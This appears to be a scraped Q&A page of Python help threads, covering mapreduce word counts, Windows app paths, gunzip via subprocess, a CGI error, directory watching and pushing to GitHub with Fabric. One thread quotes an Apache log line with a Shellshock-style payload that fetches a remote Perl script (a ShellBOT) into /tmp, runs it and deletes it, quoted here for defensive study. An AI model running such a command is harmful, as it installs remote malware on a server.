mapreduce wordcount example in using Octo module - python

I just started to learn mapreduce with Octo module with the word count example. I try to count the words in the dir hw3data (as specified below). My PC works as both the server and client.
I started with my windows cmd with 2 terminals
server: octo.py server wordcount.py
It seems the server side started without problem
client: octo.py client localhost
It seems that python can't find the txt files I stored in the hw3data dir, so it says no work, sleeping. So anyone can help?
The wordcount.py code is below
wordcount.py
server
import glob
text_files=glob.glob('C:/Python27/octopy-0.1/hw3data/*.txt')
def file_contents(file_name):
f=open(file_name)
try:
return f.read()
finally:
f.close()
source=dict((file_name,file_contents(file_name)) for file_name in text_files)
f=open('outfile','w')
def final(key,value):
print key,value
f.write(str((key,value)))
client
def mapfn(key,value):
for line in value.splitlines():
for word in line.split():
yield word.lower(),1
def reducefn(key,value):
return key,len(value)

Verify if your data files have a ".txt" in his names. I'm current working in this problem to my homework #3. Good Luck!

Change the following code
text_files=glob.glob('C:/Python27/octopy-0.1/hw3data/*.txt')
to
text_files=glob.glob('C:/Python27/octopy-0.1/hw3data/*')
and try. I guess the files in the folder do not have the extensions.

Related

Open installed apps on Windows intelligently

I am coding a voice assistant to automate my pc which is running Windows 11 and I want to open apps using voice commands, I don't want to hard code every installed app's .exe path. Is there any way to get a dictionary of the app's name and their .exe path. I am able to get currently running apps and close them using this:
def close_app(app_name):
running_apps=psutil.process_iter(['pid','name'])
found=False
for app in running_apps:
sys_app=app.info.get('name').split('.')[0].lower()
if sys_app in app_name.split() or app_name in sys_app:
pid=app.info.get('pid')
try:
app_pid = psutil.Process(pid)
app_pid.terminate()
found=True
except: pass
else: pass
if not found:
print(app_name + " is not running")
else:
print('Closed ' + app_name)
Possibly using both wmic and use either which or gmc to grab the path and build the dict?
Following is a very basic code, not tested completely.
import subprocess
import shutil
Data = subprocess.check_output(['wmic', 'product', 'get', 'name'])
a = str(Data)
appsDict = {}
x = (a.replace("b\\'Name","").split("\\r\\r\\n"))
for i in range(len(x) - 1):
appName = x[i+1].rstrip()
appPath = shutil.which(appName)
appsDict.update({appName: appPath})
print(appsDict)
Under Windows PowerShell there is a Get-Command utility. Finding Windows executables using Get-Command is described nicely in this issue. Essentially it's just running
Get-Command *
Now you need to use this from python to get the results of command as a variable. This can be done by
import subprocess
data = subprocess.check_output(['Get-Command', '*'])
Probably this is not the best, and not a complete answer, but maybe it's a useful idea.
This can be accomplished via the following code:
import os
def searchfiles(extension, folder):
with open(extension[1:] + "file.txt", "w", encoding="utf-8") as filewrite:
for r, d, f in os.walk(folder):
for file in f:
if file.endswith(extension):
filewrite.write(f"{r + file}\n")
searchfiles('.exe', 'H:\\')
Inspired from: https://pythonprogramming.altervista.org/find-all-the-files-on-your-computer/

I keep having a error when running the script. It keeps sending "name input_file is not defined"

I am trying to create a python def to unzip a few .gz files within a folder. I know that the main script works if it is not in the def. The script I have created is similar to others I have done but this one give me the error
File "unzip.py", line 24, in
decompressed_files(input_folder)
NameError: name 'input_folder' is not defined
I copied the script below so someone can help me to see where the error is. I haven't done any BioInformatics for the last couple of years and I am a bit rusty.
import glob
import sys
import os
import argparse
import subprocess
import gzip
def decompressed_files(input_folder):
print ('starting decompressed_files')
output_folder=input_folder + '/fasta_files'
if os.path.exists(output_folder):
print ('folder already exists')
else:
os.makedirs(output_folder)
for f in input_folder:
fastqs=glob.glob(input_folder + '/*.fastq.gz')
cmd =[gunzip, -k, fastqs, output_folder]
my_file=subprocess.Popen(cmd)
my_file.wait
print ('The programme has finished doing its job')
decompressed_files(input_folder)
This is done for python 2.7, I know that is old but it is the one that it is installed in my work server.
That's why when you call decompressed_files(input_folder) in the last line, you didn't define input_folder before. you should do it like this :
input_folder = 'C:/Some Address/'
decompressed_files(input_folder)

Internal Server Error in my Code?

#!/usr/bin/python3
import cgi
import cgitb
import urllib.request
import os
import sys
def enco_print(string="", encoding = "utf8"):
sys.stdout.buffer.write(string.encode(encoding) + b"\n")
cgitb.enable()
form = cgi.FieldStorage(endcoding="utf8")
name_name= form.getvalue("name")
url_name = form.getvalue("url")
response = urllib.request.urlopen(str(url_name))
html = response.read().decode("utf8")
if not os.path.exists("gecrwalt"):
os.mkdir("gecrwalt")
with open("/gecrwalt/" + str(url_name) + ".html", "w", endcoding="utf8")
as f:
f.write(str(html))
When I try to run this script, I get 500 Status Error on my Website. I can´t see what´s wrong with this code.
I´m very thankful for help.
There are a few typos where you wrote endcoding instead of encoding.
The last segment here
with open("/gecrwalt/" + str(url_name) + ".html", "w", endcoding="utf8")
as f:
f.write(str(html))
has broken indentation, not sure if this was due to a copy-paste error here on Stackoverflow.
Another issue here is that (if I understood your code correlty) url_name will contain a complete URL like http://example.com, which will result in an error because that filename is invalid. You will have to come up with some schema to safely store these files, urlencode the URL or take a hash of the URL. Your save path also starts with /, not sure if intentational, starts at the file system root.
Changing the typo and the last bit has worked for me in a quick test:
with open("gecrwalt/something.html", "w", endcoding="utf8") as f:
f.write(str(html))
Debugging hint: I started a local Python webserver process with this command (from here)
python3 -m http.server --bind localhost --cgi 8000
Accessing http://localhost:8000/cgi-bin/filename.py will show you all errors that occur, not sure about the webserver you are currently using (there should be error logs somewhere I guess).

A python script to monitor a directory for new files

Similar questions have been asked but they either did not work for me or I failed to understand the answers.
I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.
The Apache2 access log shows
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.
I really want to know what is in cox.pl which could be a modified version of Cox-Data-Usage which is there on github.
I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.
I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.
The script in question can be easily downloaded, it contains ShellBOT by: devil__ so... guess ;-)
You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
to check the script.
It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.
The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)
Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
event_handler = LoggingEventHandler()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
This will log all changes, (it can be configured for just file creation).
If you want to rename new files to something else, you first need to know if the file is free or any modifications will fail, i.e it's not finished downloading/creation. That issue can mean that a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a solution.
I got some solution,
solution 1 (CPU usage: 27.9% approx= 30%):
path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
after = dict ([(f, None) for f in os.listdir (path_to_watch)])
added = [f for f in after if not f in before]
if added:
print("Added: ", ", ".join (added))
break
else:
before = after
I have edited the code, the orginal code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
The original code was made in python 2x so you need to convert it in python 3.
NOTE:-
WHEN EVER YOU ADD ANY FILE IN PATH, IT PRINTS THE TEXT AND BREAKS, AND IF NO FILES ARE ADDED THEN IT WOULD CONTINUE TO RUN.
Solution 2 (CPU usage: 23.4 approx=20%)
import os
path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b=os.listdir(path)
path_len_org=len(b)
def file_check():
while 1:
b=os.listdir(path)
path_len_final=len(b)
if path_len_org<path_len_final:
return "A file is added"
elif path_len_org>path_len_final:
return "A file is removed"
else:
pass
file_check()

How do you define the host for Fabric to push to GitHub?

Original Question
I've got some python scripts which have been using Amazon S3 to upload screenshots taken following Selenium tests within the script.
Now we're moving from S3 to use GitHub so I've found GitPython but can't see how you use it to actually commit to the local repo and push to the server.
My script builds a directory structure similar to \images\228M\View_Use_Case\1.png in the workspace and when uploading to S3 it was a simple process;
for root, dirs, files in os.walk(imagesPath):
for name in files:
filename = os.path.join(root, name)
k = bucket.new_key('{0}/{1}/{2}'.format(revisionNumber, images_process, name)) # returns a new key object
k.set_contents_from_filename(filename, policy='public-read') # opens local file buffers to key on S3
k.set_metadata('Content-Type', 'image/png')
Is there something similar for this or is there something as simple as a bash type git add images command in GitPython that I've completely missed?
Updated with Fabric
So I've installed Fabric on kracekumar's recommendation but I can't find docs on how to define the (GitHub) hosts.
My script is pretty simple to just try and get the upload to work;
from __future__ import with_statement
from fabric.api import *
from fabric.contrib.console import confirm
import os
def git_server():
env.hosts = ['github.com']
env.user = 'git'
env.passowrd = 'password'
def test():
process = 'View Employee'
os.chdir('\Work\BPTRTI\main\employer_toolkit')
with cd('\Work\BPTRTI\main\employer_toolkit'):
result = local('ant viewEmployee_git')
if result.failed and not confirm("Tests failed. Continue anyway?"):
abort("Aborting at user request.")
def deploy():
process = "View Employee"
os.chdir('\Documents and Settings\markw\GitTest')
with cd('\Documents and Settings\markw\GitTest'):
local('git add images')
local('git commit -m "Latest Selenium screenshots for %s"' % (process))
local('git push -u origin master')
def viewEmployee():
#test()
deploy()
It Works \o/ Hurrah.
You should look into Fabric. http://docs.fabfile.org/en/1.4.1/index.html. Automated server deployment tool. I have been using this quite some time, it works pretty fine.
Here is my one of the application which uses it, https://github.com/kracekumar/sachintweets/blob/master/fabfile.py
It looks like you can do this:
index = repo.index
index.add(['images'])
new_commit = index.commit("my commit message")
and then, assuming you have origin as the default remote:
origin = repo.remotes.origin
origin.push()

Categories